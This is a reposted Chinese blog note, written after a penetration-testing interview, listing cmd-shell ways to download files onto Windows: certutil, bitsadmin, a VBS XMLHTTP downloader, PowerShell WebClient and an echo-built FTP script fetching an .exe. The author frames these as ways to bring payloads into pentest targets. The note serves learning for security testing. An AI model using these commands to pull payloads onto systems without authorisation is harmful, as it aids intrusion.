cmd 环境下载文件的几种方法

来源:csdn博客 分类: 文章浏览史 发布时间:2020-06-14 21:30:43 最后更新:2020-06-14 浏览:173
转载声明:
本文为摘录自“csdn博客”,版权归原作者所有。
温馨提示:
为了更好的体验,请点击原文链接进行浏览
摘录时间:
2020-06-14 21:30:43

今天渗透测试面试提到cmd下载文件  ,自己只写了jscertutil,还有几种常见的方法自己没想起来 这里记录和总结下 。

(自己还是太菜太垃圾。)

 

0x01 certutil

certutil 是一个证书工具,功能挺丰富的,参数非常多

 

certutil -urlcache -split -f http://xxxxxx
certutil -urlcache -split -f https://xxxxxx 1.txt #指定保存文件名

 

 

 

 

0x02 bitsadmin

bitsadmin /transfer n http://www.xx.com/index.txt K:\111.txt

 

 

 

 

 0x03 vbs

这里vbs下载用到代码:

iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2

 

利用csript:执行脚本文件

 

K:\>cscript 1.vbs http://xxxxxx/index.txt 111.txt

 

 

 

0x04 powershell

powershell (new-object System.Net.WebClient).DownloadFile( 'http://www.xx.com/index.txt','K:\111.txt')

 

 

 

 

 

 

 

0x05 ftp

echo open 8.8.8.8  >a.txt & echo get fuck.exe>>a.txt &echo bye>>a.txt
ftp -A -s:a.txt

 

 

 

今天出去喝了点酒 还有几种渗透环境中下载payload的方式  先睡了。。

 


php技术微信